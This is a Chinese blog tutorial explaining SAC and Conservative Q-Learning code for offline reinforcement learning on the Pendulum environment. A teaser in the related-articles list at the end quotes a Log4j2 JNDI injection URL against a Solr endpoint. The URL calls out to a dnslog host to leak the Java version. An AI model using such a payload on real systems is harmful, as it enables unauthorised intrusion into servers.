基于“动手学强化学习”的知识点(五):第 18 章 离线强化学习(gym版本 >= 0.26)

news2025/3/19 11:16:35

第 18 章 离线强化学习(gym版本 >= 0.26)

  • 摘要
  • SAC 算法部分
  • CQL 算法
    • CQL 总结与大函数意义
    • CQL 总结
    • CQL 类详细分析

摘要

本系列知识点讲解基于动手学强化学习中的内容进行详细的疑难点分析!具体内容请阅读动手学强化学习!


对应动手学强化学习——离线强化学习


SAC 算法部分

代码讲解对应基于“动手学强化学习”的知识点(一):第 14 章 SAC 算法(gym版本 >= 0.26)

为了生成数据集,在倒立摆环境中从零开始训练一个在线 SAC 智能体,直到算法达到收敛效果,把训练过程中智能体采集的所有轨迹保存下来作为数据集。这样,数据集中既包含训练初期较差策略的采样,又包含训练后期较好策略的采样,是一个混合数据集。下面给出生成数据集的代码,SAC 部分直接使用 14.5 节中的代码,因此不再详细解释。——18.4 CQL 代码实践


import numpy as np
import gym
from tqdm import tqdm
import random
import rl_utils
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.distributions import Normal
import matplotlib.pyplot as plt


# 传统的SAC算法
class PolicyNetContinuous(torch.nn.Module):
    def __init__(self, state_dim, hidden_dim, action_dim, action_bound):
        super(PolicyNetContinuous, self).__init__()
        self.fc1 = torch.nn.Linear(state_dim, hidden_dim)
        self.fc_mu = torch.nn.Linear(hidden_dim, action_dim)
        self.fc_std = torch.nn.Linear(hidden_dim, action_dim)
        self.action_bound = action_bound

    def forward(self, x):
        x = F.relu(self.fc1(x))
        mu = self.fc_mu(x)
        std = F.softplus(self.fc_std(x))
        dist = Normal(mu, std)
        normal_sample = dist.rsample()  # rsample()是重参数化采样
        log_prob = dist.log_prob(normal_sample)
        action = torch.tanh(normal_sample)
        # 计算tanh_normal分布的对数概率密度
        log_prob = log_prob - torch.log(1 - torch.tanh(action).pow(2) + 1e-7)
        action = action * self.action_bound
        return action, log_prob


class QValueNetContinuous(torch.nn.Module):
    def __init__(self, state_dim, hidden_dim, action_dim):
        super(QValueNetContinuous, self).__init__()
        self.fc1 = torch.nn.Linear(state_dim + action_dim, hidden_dim)
        self.fc2 = torch.nn.Linear(hidden_dim, hidden_dim)
        self.fc_out = torch.nn.Linear(hidden_dim, 1)

    def forward(self, x, a):
        cat = torch.cat([x, a], dim=1)
        x = F.relu(self.fc1(cat))
        x = F.relu(self.fc2(x))
        return self.fc_out(x)


class SACContinuous:
    ''' 处理连续动作的SAC算法 '''
    def __init__(self, state_dim, hidden_dim, action_dim, action_bound,
                 actor_lr, critic_lr, alpha_lr, target_entropy, tau, gamma,
                 device):
        self.actor = PolicyNetContinuous(state_dim, hidden_dim, action_dim,
                                         action_bound).to(device)  # 策略网络
        self.critic_1 = QValueNetContinuous(state_dim, hidden_dim,
                                            action_dim).to(device)  # 第一个Q网络
        self.critic_2 = QValueNetContinuous(state_dim, hidden_dim,
                                            action_dim).to(device)  # 第二个Q网络
        self.target_critic_1 = QValueNetContinuous(state_dim,
                                                   hidden_dim, action_dim).to(
                                                       device)  # 第一个目标Q网络
        self.target_critic_2 = QValueNetContinuous(state_dim,
                                                   hidden_dim, action_dim).to(
                                                       device)  # 第二个目标Q网络
        # 令目标Q网络的初始参数和Q网络一样
        self.target_critic_1.load_state_dict(self.critic_1.state_dict())
        self.target_critic_2.load_state_dict(self.critic_2.state_dict())
        self.actor_optimizer = torch.optim.Adam(self.actor.parameters(),
                                                lr=actor_lr)
        self.critic_1_optimizer = torch.optim.Adam(self.critic_1.parameters(),
                                                   lr=critic_lr)
        self.critic_2_optimizer = torch.optim.Adam(self.critic_2.parameters(),
                                                   lr=critic_lr)
        # 使用alpha的log值,可以使训练结果比较稳定
        self.log_alpha = torch.tensor(np.log(0.01), dtype=torch.float)
        self.log_alpha.requires_grad = True  #对alpha求梯度
        self.log_alpha_optimizer = torch.optim.Adam([self.log_alpha],
                                                    lr=alpha_lr)
        self.target_entropy = target_entropy  # 目标熵的大小
        self.gamma = gamma
        self.tau = tau
        self.device = device

    def take_action(self, state):
        if isinstance(state, tuple):
            state = state[0]
        state = torch.tensor([state], dtype=torch.float).to(self.device)
        action = self.actor(state)[0]
        return [action.item()]

    def calc_target(self, rewards, next_states, dones):  # 计算目标Q值
        next_actions, log_prob = self.actor(next_states)
        entropy = -log_prob
        q1_value = self.target_critic_1(next_states, next_actions)
        q2_value = self.target_critic_2(next_states, next_actions)
        next_value = torch.min(q1_value,
                               q2_value) + self.log_alpha.exp() * entropy
        td_target = rewards + self.gamma * next_value * (1 - dones)
        return td_target

    def soft_update(self, net, target_net):
        for param_target, param in zip(target_net.parameters(),
                                       net.parameters()):
            param_target.data.copy_(param_target.data * (1.0 - self.tau) +
                                    param.data * self.tau)

    def update(self, transition_dict):
        states = torch.tensor(transition_dict['states'],
                              dtype=torch.float).to(self.device)
        actions = torch.tensor(transition_dict['actions'],
                               dtype=torch.float).view(-1, 1).to(self.device)
        rewards = torch.tensor(transition_dict['rewards'],
                               dtype=torch.float).view(-1, 1).to(self.device)
        next_states = torch.tensor(transition_dict['next_states'],
                                   dtype=torch.float).to(self.device)
        dones = torch.tensor(transition_dict['dones'],
                             dtype=torch.float).view(-1, 1).to(self.device)
        rewards = (rewards + 8.0) / 8.0  # 对倒立摆环境的奖励进行重塑

        # 更新两个Q网络
        td_target = self.calc_target(rewards, next_states, dones)
        critic_1_loss = torch.mean(
            F.mse_loss(self.critic_1(states, actions), td_target.detach()))
        critic_2_loss = torch.mean(
            F.mse_loss(self.critic_2(states, actions), td_target.detach()))
        self.critic_1_optimizer.zero_grad()
        critic_1_loss.backward()
        self.critic_1_optimizer.step()
        self.critic_2_optimizer.zero_grad()
        critic_2_loss.backward()
        self.critic_2_optimizer.step()

        # 更新策略网络
        new_actions, log_prob = self.actor(states)
        entropy = -log_prob
        q1_value = self.critic_1(states, new_actions)
        q2_value = self.critic_2(states, new_actions)
        actor_loss = torch.mean(-self.log_alpha.exp() * entropy -
                                torch.min(q1_value, q2_value))
        self.actor_optimizer.zero_grad()
        actor_loss.backward()
        self.actor_optimizer.step()

        # 更新alpha值
        alpha_loss = torch.mean(
            (entropy - self.target_entropy).detach() * self.log_alpha.exp())
        self.log_alpha_optimizer.zero_grad()
        alpha_loss.backward()
        self.log_alpha_optimizer.step()

        self.soft_update(self.critic_1, self.target_critic_1)
        self.soft_update(self.critic_2, self.target_critic_2)


env_name = 'Pendulum-v1'
env = gym.make(env_name)
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
action_bound = env.action_space.high[0]  # 动作最大值
random.seed(0)
np.random.seed(0)
if not hasattr(env, 'seed'):
    def seed_fn(self, seed=None):
        env.reset(seed=seed)
        return [seed]
    env.seed = seed_fn.__get__(env, type(env))
# env.seed(0)
torch.manual_seed(0)

actor_lr = 3e-4
critic_lr = 3e-3
alpha_lr = 3e-4
num_episodes = 100
hidden_dim = 128
gamma = 0.99
tau = 0.005  # 软更新参数
buffer_size = 100000
minimal_size = 1000
batch_size = 64
target_entropy = -env.action_space.shape[0]
device = torch.device("cuda") if torch.cuda.is_available() else torch.device(
    "cpu")

replay_buffer = rl_utils.ReplayBuffer(buffer_size)
agent = SACContinuous(state_dim, hidden_dim, action_dim, action_bound,
                      actor_lr, critic_lr, alpha_lr, target_entropy, tau,
                      gamma, device)

return_list = rl_utils.train_off_policy_agent(env, agent, num_episodes,
                                              replay_buffer, minimal_size,
                                              batch_size)

episodes_list = list(range(len(return_list)))
plt.plot(episodes_list, return_list)
plt.xlabel('Episodes')
plt.ylabel('Returns')
plt.title('SAC on {}'.format(env_name))
plt.show()

CQL 算法

CQL 总结与大函数意义

CQL(Conservative Q-Learning) 类的整体设计在 SAC 算法基础上增加了保守性正则项,用于减少 Q 函数过估计,改善离线 RL 表现。

  • 构造函数

    • 意义:初始化 SAC 中的 actor、critic(两个及对应目标网络)、以及温度参数和优化器,并传入 CQL 特有的超参数 beta(正则系数)和 num_random(动作采样数)。
    • 输入:状态、动作维度、各个学习率、目标熵、tau、gamma、设备、beta、num_random。
    • 输出:构造好的 CQL 实例,准备进行更新。
  • take_action

    • 意义:给定状态,利用 actor 网络采样动作,用于与环境交互。
    • 输入:单个状态(例如 [0.1, 0.2, -0.1])。
    • 输出:对应动作(例如 [0.8])。
  • soft_update

    • 意义:平滑更新目标 Q 网络参数,保证训练稳定性。
    • 输入:当前 Q 网络和对应目标网络。
    • 输出:目标网络参数更新为旧值与当前值的线性组合。
  • update

    • 意义:使用一批真实环境转移数据更新 actor、critic 网络和温度参数 (\alpha),同时在 SAC 基础上加入 CQL 正则项
      L CQL = L critic + β ( log ⁡ ∑ exp ⁡ ( Q ( s , a ′ ) − log ⁡ π ref ( a ′ ) ) − E ( s , a ) ∼ D [ Q ( s , a ) ] ) L_{\text{CQL}} = L_{\text{critic}} + \beta \Big(\log\sum \exp(Q(s,a') - \log \pi_{\text{ref}}(a')) - \mathbb{E}_{(s,a) \sim D}[Q(s,a)]\Big) LCQL=Lcritic+β(logexp(Q(s,a)logπref(a))E(s,a)D[Q(s,a)])
      其中通过对随机动作、策略动作和下一动作进行采样,计算 logsumexp 的项。
    • 步骤
      1. 计算 TD 目标 y = r + γ ( min ⁡ ( Q 1 ′ , Q 2 ′ ) + α ⋅ entropy ) y = r + \gamma ( \min(Q_1', Q_2') + \alpha \cdot \text{entropy}) y=r+γ(min(Q1,Q2)+αentropy)
      2. 分别计算 critic_1_loss 与 critic_2_loss(均方误差损失)。
      3. 额外采样一批随机动作(均匀分布),以及策略生成的当前和下一动作,对各个 Q 网络的输出进行 logsumexp 操作,形成 CQL 正则项;
      4. 总的 critic 损失 = SAC critic loss + β \beta β×(CQL 正则项差值)。
      5. 分别更新 critic_1 与 critic_2;
      6. 更新 actor,使其最大化 min ⁡ ( Q 1 , Q 2 ) − α log ⁡ π ( a ∣ s ) \min(Q_1, Q_2) - \alpha \log\pi(a|s) min(Q1,Q2)αlogπ(as)
      7. 更新 α \alpha α 使策略熵接近目标熵;
      8. 最后对目标网络进行软更新。
    • 输入
      • transition_dict 包含 ‘states’, ‘actions’, ‘rewards’, ‘next_states’, ‘dones’。
    • 输出
      • 模型参数更新后,策略和 Q 网络得到改进。

CQL 总结

CQL 类在 SAC 框架下增加了保守性正则项,以降低 Q 函数对未见动作过高的估计,从而实现更为保守的 Q 学习。主要流程包括:

  • 网络初始化:构造策略网络、两个 Q 网络、对应目标网络,温度参数 (\alpha) 及其优化器,以及 SAC 固有参数(gamma、tau、目标熵)和 CQL 超参数(beta、num_random)。
  • 动作采样(take_action):给定状态通过 actor 网络采样动作。
  • 软更新(soft_update):平滑更新目标网络参数。
  • 更新过程(update):
    1. 从 transition_dict 中读取数据并转换为张量;
    2. 计算 SAC 的 TD 目标和 critic 损失;
    3. 额外采样随机动作及策略动作,并计算 CQL 正则项(通过 logsumexp);
    4. 总的 critic 损失 = SAC critic loss + beta*(正则项差值);
    5. 更新 critic 网络、策略网络及温度参数 (\alpha);
    6. 最后软更新目标网络参数。

CQL 类详细分析

class CQL:
    ''' CQL算法 '''
    def __init__(self, state_dim, hidden_dim, action_dim, action_bound,
                 actor_lr, critic_lr, alpha_lr, target_entropy, tau, gamma,
                 device, beta, num_random):
        """
        定义 CQL 类构造函数,接收状态、隐藏、动作维度、动作范围,
        以及各优化器学习率、目标熵、tau、gamma、
        设备、CQL正则系数 beta 和随机采样数 num_random。
        """
        '''创建策略网络(actor),用于输出动作分布并采样连续动作。'''
        self.actor = PolicyNetContinuous(state_dim, hidden_dim, action_dim, action_bound).to(device)
        '''创建两个 Q 网络,分别用于评估 (state,action) 对的价值,帮助降低过估计偏差。'''
        self.critic_1 = QValueNetContinuous(state_dim, hidden_dim, action_dim).to(device)
        self.critic_2 = QValueNetContinuous(state_dim, hidden_dim, action_dim).to(device)
        '''创建目标 Q 网络,用于计算 TD 目标,使得训练更稳定。'''
        self.target_critic_1 = QValueNetContinuous(state_dim, hidden_dim, action_dim).to(device)
        self.target_critic_2 = QValueNetContinuous(state_dim, hidden_dim, action_dim).to(device)
        '''复制 critic 网络参数到目标网络,保证初始时一致。'''
        self.target_critic_1.load_state_dict(self.critic_1.state_dict())
        self.target_critic_2.load_state_dict(self.critic_2.state_dict())
        '''为策略网络分配 Adam 优化器,学习率 actor_lr。'''
        self.actor_optimizer = torch.optim.Adam(self.actor.parameters(), lr=actor_lr)
        '''分别为两个 Q 网络创建 Adam 优化器。'''
        self.critic_1_optimizer = torch.optim.Adam(self.critic_1.parameters(), lr=critic_lr)
        self.critic_2_optimizer = torch.optim.Adam(self.critic_2.parameters(), lr=critic_lr)
        '''初始化温度参数的对数,log_alpha = log(0.01) ≈ -4.6052。'''
        self.log_alpha = torch.tensor(np.log(0.01), dtype=torch.float)
        '''使 log_alpha 可求梯度,从而在训练过程中自动调整 alpha=exp({log_alpha})。'''
        self.log_alpha.requires_grad = True  #对alpha求梯度
        '''为 log_alpha 创建 Adam 优化器,学习率 alpha_lr。'''
        self.log_alpha_optimizer = torch.optim.Adam([self.log_alpha], lr=alpha_lr)
        '''保存目标熵,用于温度调整。'''
        self.target_entropy = target_entropy  # 目标熵的大小
        '''保存折扣因子 gamma。'''
        self.gamma = gamma
        '''保存软更新系数 tau,用于目标网络更新。'''
        self.tau = tau
        '''保存 CQL 损失函数中的系数 beta,用于权衡 Q 网络额外正则项。'''
        self.beta = beta  # CQL损失函数中的系数
        '''保存 CQL 中在计算正则项时所采样的随机动作数,用于估计动作分布上界。'''
        self.num_random = num_random  # CQL中的动作采样数

    def take_action(self, state):
        """定义策略执行接口,给定单个状态,输出对应动作。"""
        if isinstance(state, tuple):
            state = state[0]
        state = torch.tensor([state], dtype=torch.float).to(device)
        # action = self.actor(state)[0]
        # log_prob = self.actor(state)[1]
        action, log_prob = self.actor(state)
        return [action.item()]

    def soft_update(self, net, target_net):
        """对目标网络进行软更新,即用当前网络参数更新目标网络参数。"""
        for param_target, param in zip(target_net.parameters(), net.parameters()):
            param_target.data.copy_(param_target.data * (1.0 - self.tau) + param.data * self.tau)

    def update(self, transition_dict):
        """
        定义策略与 Q 网络的更新过程,使用从环境采集的经验数据更新所有网络参数,同时计算 CQL 的额外正则项。
        """
        '''从transition_dict中提取数据'''
        states = torch.tensor(transition_dict['states'], dtype=torch.float).to(device)
        actions = torch.tensor(transition_dict['actions'], dtype=torch.float).view(-1, 1).to(device)
        rewards = torch.tensor(transition_dict['rewards'], dtype=torch.float).view(-1, 1).to(device)
        next_states = torch.tensor(transition_dict['next_states'], dtype=torch.float).to(device)
        dones = torch.tensor(transition_dict['dones'], dtype=torch.float).view(-1, 1).to(device)
        '''对奖励进行归一化处理,这里将倒立摆环境的奖励平移与缩放,使得奖励范围更加稳定。'''
        rewards = (rewards + 8.0) / 8.0  # 对倒立摆环境的奖励进行重塑
        '''对所有下一状态通过 actor 得到下一动作及其对数概率。'''
        next_actions, log_prob = self.actor(next_states)
        '''计算熵项,即熵 = - log_prob。'''
        entropy = -log_prob
        '''用目标 Q 网络计算下一状态下的 Q 值估计。'''
        q1_value = self.target_critic_1(next_states, next_actions)
        q2_value = self.target_critic_2(next_states, next_actions)
        '''计算下一时刻的价值估计,选择较小的 Q 值(双 Q 机制),并加入熵正则项 α⋅entropy。'''
        next_value = torch.min(q1_value, q2_value) + self.log_alpha.exp() * entropy
        '''
        计算 TD 目标,若 done 为 1(终止状态)则不加折扣。
        td_target = 当前的即时奖励 + gamma*下一阶段的奖励
        '''
        td_target = rewards + self.gamma * next_value * (1 - dones)
        '''
        分别计算两个 Q 网络的均方误差(MSE)损失,相对于 td_target(detach防止梯度流向目标)。
        '''
        critic_1_loss = torch.mean(F.mse_loss(self.critic_1(states, actions), td_target.detach()))
        critic_2_loss = torch.mean(F.mse_loss(self.critic_2(states, actions), td_target.detach()))

        # 以上与SAC相同,以下Q网络更新是CQL的额外部分
        '''取当前批次样本数量。'''
        batch_size = states.shape[0]
        '''
        作用:
        - 生成一组随机均匀分布的动作,形状为 (batch_size*num_random, action_dim),范围在 [-1,1]。
        - 用于 CQL 正则项计算,作为额外的动作样本。
        数值例子:
        - 若 batch_size=64, num_random=10, action_dim=1,则生成形状为 (640,1) 的随机动作,
          如 [[0.23], [-0.45], …]。
        '''
        random_unif_actions = torch.rand([batch_size * self.num_random, actions.shape[-1]], dtype=torch.float).uniform_(-1, 1).to(device)
        '''
        作用:
        计算均匀分布的对数概率密度。
        - 由于在连续区间 [−1,1] 中,均匀密度为 1/2 对于每个动作维度,因此对数概率为 log(0.5);
        - 对于 action_dim 个维度,总和为 log(0.5^action_dim)。
        '''
        random_unif_log_pi = np.log(0.5**next_actions.shape[-1])
        # random_unif_log_pi = np.log(0.5) * next_actions.shape[-1]
        '''
        作用:增加数据集
        - 将 states 增加一个新维度,重复 num_random 次,使得每个样本重复 num_random 次,
          最后 reshape 成 (batch_size*num_random, state_dim)。
        数值例子:
        - 若 states shape=(64,3), 
          unsqueeze后变为 (64,1,3), 
          repeat 后变为 (64,10,3), view 后为 (640,3).
        '''
        tmp_states = states.unsqueeze(1).repeat(1, self.num_random, 1).view(-1, states.shape[-1])
        tmp_next_states = next_states.unsqueeze(1).repeat(1, self.num_random, 1).view(-1, next_states.shape[-1])
        '''用策略网络对 tmp_states(重复后的真实状态)采样动作,得到随机采样的当前动作及其对数概率。'''
        random_curr_actions, random_curr_log_pi = self.actor(tmp_states)
        '''同理,对 tmp_next_states 采样下一步动作和对应对数概率。'''
        random_next_actions, random_next_log_pi = self.actor(tmp_next_states)
        '''用 critic 网络计算对于 tmp_states 与随机均匀动作 random_unif_actions 的 Q 值,之后 reshape 成 (batch_size, num_random, 1)。'''
        q1_unif = self.critic_1(tmp_states, random_unif_actions).view(-1, self.num_random, 1)
        q2_unif = self.critic_2(tmp_states, random_unif_actions).view(-1, self.num_random, 1)
        '''用 critic 网络计算对于 tmp_states 与随机当前动作的 Q 值,并 reshape。'''
        q1_curr = self.critic_1(tmp_states, random_curr_actions).view(-1, self.num_random, 1)
        q2_curr = self.critic_2(tmp_states, random_curr_actions).view(-1, self.num_random, 1)
        '''用 critic 网络计算对于 tmp_states 与随机下一动作的 Q 值,并 reshape。'''
        q1_next = self.critic_1(tmp_states, random_next_actions).view(-1, self.num_random, 1)
        q2_next = self.critic_2(tmp_states, random_next_actions).view(-1, self.num_random, 1)
        '''
        作用:
        - 将三部分 Q 值进行拼接:
          1. 对于随机均匀采样动作:减去其对数概率(固定值);
          2. 对于策略采样的当前动作:减去对应对数概率(detach 后避免梯度传递);
          3. 对于策略采样的下一动作:同理。
        - 拼接维度为第 1 维(即动作样本维度)。
        数值例子:
        - 假设每个部分形状为 (64,10,1),拼接后 q1_cat 形状为 (64,30,1)。
        在 Conservative Q-Learning (CQL) 中,为了防止 Q 函数在离线数据之外的动作上过高估计,
        会在 critic 损失中增加一个正则项。正则项的思想是“保守地”估计 Q 值,使得对于未见过的动作,
        Q 值不至于过高。具体来说,CQL 的正则项大致形式为:
                            Penalty=logE_{a∼μ}[exp(Q(s,a)−logμ(a))]−E_{(s,a)∼D}[Q(s,a)]
        '''
        q1_cat = torch.cat([
            q1_unif - random_unif_log_pi,
            q1_curr - random_curr_log_pi.detach().view(-1, self.num_random, 1),
            q1_next - random_next_log_pi.detach().view(-1, self.num_random, 1)
        ], dim=1)
        q2_cat = torch.cat([
            q2_unif - random_unif_log_pi,
            q2_curr - random_curr_log_pi.detach().view(-1, self.num_random, 1),
            q2_next - random_next_log_pi.detach().view(-1, self.num_random, 1)
        ], dim=1)
        '''
        作用:
        - 对 q1_cat 和 q2_cat 在动作维度上做 logsumexp 操作,再取平均,得到一个标量,
          表示对所有随机动作样本的软最大值。
        - logsumexp 是一种平滑的最大值函数,计算公式:
                            log∑_iexp(xi)
        '''
        qf1_loss_1 = torch.logsumexp(q1_cat, dim=1).mean()
        qf2_loss_1 = torch.logsumexp(q2_cat, dim=1).mean()
        '''分别计算 critic 网络对于当前真实 (states, actions) 的 Q 值的均值。'''
        qf1_loss_2 = self.critic_1(states, actions).mean()
        qf2_loss_2 = self.critic_2(states, actions).mean()
        '''将原本 SAC 中的 critic 损失(均方误差)与 CQL 正则项相加,构成最终 critic 损失。'''
        qf1_loss = critic_1_loss + self.beta * (qf1_loss_1 - qf1_loss_2)
        qf2_loss = critic_2_loss + self.beta * (qf2_loss_1 - qf2_loss_2)
        '''
        对 critic_1 的损失进行反向传播更新。
        对 critic_2 的损失进行反向传播更新。
        '''
        self.critic_1_optimizer.zero_grad()
        qf1_loss.backward(retain_graph=True)
        self.critic_1_optimizer.step()
        self.critic_2_optimizer.zero_grad()
        qf2_loss.backward(retain_graph=True)
        self.critic_2_optimizer.step()

        # 更新策略网络
        '''使用当前策略对真实状态采样动作,并获得对应对数概率。
        self.actor未更新'''
        new_actions, log_prob = self.actor(states)
        entropy = -log_prob
        '''
        评估当前策略生成的动作的 Q 值,使用 critic_1 和 critic_2 分别计算,并取最小值以降低过估计。
        self.critic_1和self.critic_2是刚更新过的
        '''
        q1_value = self.critic_1(states, new_actions)
        q2_value = self.critic_2(states, new_actions)
        '''
        作用:
        - 计算策略损失,目标是最大化 min(𝑄1,𝑄2)−𝛼log𝜋;这里取负号后作为损失。
        '''
        actor_loss = torch.mean(-self.log_alpha.exp() * entropy - torch.min(q1_value, q2_value))
        self.actor_optimizer.zero_grad()
        actor_loss.backward()
        self.actor_optimizer.step()

        # 更新alpha值
        '''
        作用:
        - 计算温度参数 α 的损失,目标是使策略熵接近目标熵。
        - detach() 表示不对 entropy 反向传播梯度,只更新 alpha。
        SAC原始论文中:
                            J(α)=E_{a∼π}[−α(logπ(a∣s)+Htarget)],其中H=−logπ(a∣s)
        '''
        alpha_loss = torch.mean((entropy - self.target_entropy).detach() * self.log_alpha.exp())
        self.log_alpha_optimizer.zero_grad()
        alpha_loss.backward()
        self.log_alpha_optimizer.step()

        self.soft_update(self.critic_1, self.target_critic_1)
        self.soft_update(self.critic_2, self.target_critic_2)


random.seed(0)
np.random.seed(0)

if not hasattr(env, 'seed'):
    def seed_fn(self, seed=None):
        env.reset(seed=seed)
        return [seed]
    env.seed = seed_fn.__get__(env, type(env))
# env.seed(0)
torch.manual_seed(0)

beta = 5.0
num_random = 5
num_epochs = 100
num_trains_per_epoch = 500

agent = CQL(state_dim, hidden_dim, action_dim, action_bound, actor_lr,
            critic_lr, alpha_lr, target_entropy, tau, gamma, device, beta,
            num_random)

return_list = []
for i in range(10):
    with tqdm(total=int(num_epochs / 10), desc='Iteration %d' % i) as pbar:
        for i_epoch in range(int(num_epochs / 10)):
            # 此处与环境交互只是为了评估策略,最后作图用,不会用于训练
            epoch_return = 0
            state = env.reset()
            done = False
            while not done:
                action = agent.take_action(state)
                result = env.step(action)
                if len(result) == 5:
                    next_state, reward, done, truncated, info = result
                    done = done or truncated  # 可合并 terminated 和 truncated 标志
                else:
                    next_state, reward, done, info = result
                # next_state, reward, done, _ = env.step(action)
                state = next_state
                epoch_return += reward
            return_list.append(epoch_return)

            for _ in range(num_trains_per_epoch):
                b_s, b_a, b_r, b_ns, b_d = replay_buffer.sample(batch_size)
                transition_dict = {
                    'states': b_s,
                    'actions': b_a,
                    'next_states': b_ns,
                    'rewards': b_r,
                    'dones': b_d
                }
                agent.update(transition_dict)

            if (i_epoch + 1) % 10 == 0:
                pbar.set_postfix({
                    'epoch':
                    '%d' % (num_epochs / 10 * i + i_epoch + 1),
                    'return':
                    '%.3f' % np.mean(return_list[-10:])
                })
            pbar.update(1)


epochs_list = list(range(len(return_list)))
plt.plot(epochs_list, return_list)
plt.xlabel('Epochs')
plt.ylabel('Returns')
plt.title('CQL on {}'.format(env_name))
plt.show()

mv_return = rl_utils.moving_average(return_list, 9)
plt.plot(episodes_list, mv_return)
plt.xlabel('Episodes')
plt.ylabel('Returns')
plt.title('CQL on {}'.format(env_name))
plt.show()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2317756.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

搞定python之九----常用内置模块

本文是《搞定python》系列文章的第九篇,介绍常用的内置模块的使用。到此为止python的基础用法就彻底说完了,大家可以在此基础上学习爬虫、web处理等框架了。 本文的代码相对比较多,大家注意看代码即可。python的文档我贴出来,毕竟…

判断是不是完全二叉树(C++)

目录 1 问题描述 1.1 示例1 1.2 示例2 1.3 示例3 2 解题思路 3 代码实现 4 代码解析 4.1 定义队列,初始化根节点 4.2 层序遍历,处理每个节点 4.3 处理空节点 4.4 处理非空节点 5 总结 1 问题描述 给定一个二叉树,确定他是否是一…

神经外科手术规划的实现方案及未来发展方向

Summary: 手术规划软件 效果图,样例: 神经外科手术规划样例: 神经外科手术规划,三维重建,三维建模,三维可视化 Part1: 手术规划的定义与作用 一、手术规划的定义 手术规划是指在手术前,通过详…

easypoi导入Excel兼容日期和字符串格式的日期和时间

问题场景 在使用easypoi导入Excel时,涉及到的常用日期会有yyyy-MM-dd HH:mm:ss、yyyy-MM-dd和HH:mm:ss,但是Excel上面的格式可不止这些,用户总会输入一些其他格式,如 如果在定义verify时用下面这种格式定义,那么总会…

【计算机视觉】工业表计读数(2)--表计检测

1. 简介 工业表计(如压力表、电表、气表等)在工控系统、能源管理等领域具有重要应用。然而,传统人工抄表不仅工作量大、效率低,而且容易产生数据误差。近年来,基于深度学习的目标检测方法在工业检测中展现出极大优势&…

Zbrush插件安装

安装目录在: ...\Zbrush2022\ZStartup\ZPlugs64

LeRobot源码剖析——对机器人各个动作策略的统一封装:包含ALOHA ACT、Diffusion Policy、VLA模型π0

前言 过去2年多的深入超过此前7年,全靠夜以继日的勤奋,一天当两天用,抠论文 抠代码 和大模型及具身同事讨论,是目前日常 而具身库里,idp3、π0、lerobot值得反复研究,故,近期我一直在抠π0及l…

OpenCV基础【图像和视频的加载与显示】

目录 一.创建一个窗口,显示图片 二.显示摄像头/多媒体文件 三.把摄像头录取到的视频存储在本地 四.鼠标回调事件 五.TrackBar滑动条 一.创建一个窗口,显示图片 import cv2img_path "src/fengjing.jpg" # 自己的图片路径 img cv2.imre…

杨校老师课堂之编程入门与软件安装【图文笔记】

亲爱的同学们,热烈欢迎踏入青少年编程的奇妙世界! 我是你们的授课老师杨校 ,期待与大家一同开启编程之旅。 1. 轻松叩开编程之门 1.1 程序的定义及生活中的应用 程序是人与计算机沟通的工具。在日常生活中,像手机里的各类 APP、电…

Excel(函数篇):IF函数、FREQUNCY函数、截取函数、文本处理函数、日期函数、常用函数详解

目录 IF函数等于判断区间判断与AND函数、OR函数一同使用IFNA函数和IFERROR函数 FREQUNCY函数、分断统计LEFT、RIGHT、MID截取函数FIND函数、LEN函数SUBSTITUTE函数ASC函数、WIDECHAR函数实战:如何获取到表中所有工作簿名称文本处理函数TEXT函数TEXTJOIN函数 日期函数…

利用大语言模型生成的合成数据训练YOLOv12:提升商业果园苹果检测的精度与效

之前小编分享过关于《YOLO11-CBAM集成:提升商业苹果园树干与树枝分割的精准度》,改进YOLO11算法后,进行苹果树的实例分割。本期文章我们将分享关于最新的YOLO12算法改进的苹果目标检测。 论文题目:Improved YOLOv12 with LLM-Gen…

整合百款经典街机游戏的模拟器介绍

对于80、90后而言,街机游戏承载着童年的欢乐记忆。今天要给大家介绍一款超棒的软件——「MXui街机厅经典游戏101款」,它能带你重回那段热血沸腾的街机时光。 「MXui街机厅经典游戏101款」是一款绿色免安装的街机模拟器,体积约1.39G。无需繁琐…

中小型企业大数据平台全栈搭建:Hive+HDFS+YARN+Hue+ZooKeeper+MySQL+Sqoop+Azkaban 保姆级配置指南

目录 背景‌一、环境规划与依赖准备‌1. 服务器规划(3节点集群)2. 系统与依赖‌3. Hadoop生态组件版本与下载路径4. 架构图二、Hadoop(HDFS+YARN)安装与配置‌1. 下载与解压(所有节点)2. HDFS高可用配置3. YARN资源配置‌4. 启动Hadoop集群三、MySQL安装与Hive元数据配置…

Tomcat、Open Liberty 和 WebSphere Application Server (WAS) 的配置、调试和跟踪

一、Tomcat Tomcat 是一个轻量级的开源 Java Servlet 容器。 1、配置 Tomcat 的主要配置文件位于其安装目录下的 conf 文件夹中。 server.xml: 这是 Tomcat 的核心配置文件,包含了服务器的基本设置,例如端口号、连接器配置、虚拟主机配置、以及全局的…

使用yolov8+flask实现精美登录界面+图片视频摄像头检测系统

这个是使用flask实现好看登录界面和友好的检测界面实现yolov8推理和展示,代码仅仅有2个html文件和一个python文件,真正做到了用最简洁的代码实现复杂功能。 测试通过环境: windows x64 anaconda3python3.8 ultralytics8.3.81 flask1.1.2…

微软OneNote无法同步解决方案

目录 前言原因UWP特性 解决方案C***h注册表 参考链接 前言 假设有多台Windows电脑,最方便且免费的多设备笔记同步方案就是微软自家的OneNote,使用OneDrive自带的5G云存储。 但是在国内大陆的OneNote,经常会出现无法同步、同步失败&#xff1…

Log4j2漏洞实战

1,打开环境后访问该ip 2,打开dnslog.cn,获取一个域名,我们这里是2bfvl6.dnslog.cn 3,访问http://47.122.51.245:8983/solr/admin/coresaction${jndi:ldap://${sys:java.version}.2bfvl6.dnslog.cn} 4,返回d…

【含文档+PPT+源码】基于小程序的智能停车管理系统设计与开发

项目介绍 本课程演示的是一款基于小程序的智能停车管理系统设计与开发,主要针对计算机相关专业的正在做毕设的学生与需要项目实战练习的 Java 学习者。 1.包含:项目源码、项目文档、数据库脚本、软件工具等所有资料 2.带你从零开始部署运行本套系统 3…

idea 编译打包nacos2.0.3源码,生成可执行jar 包常见问题

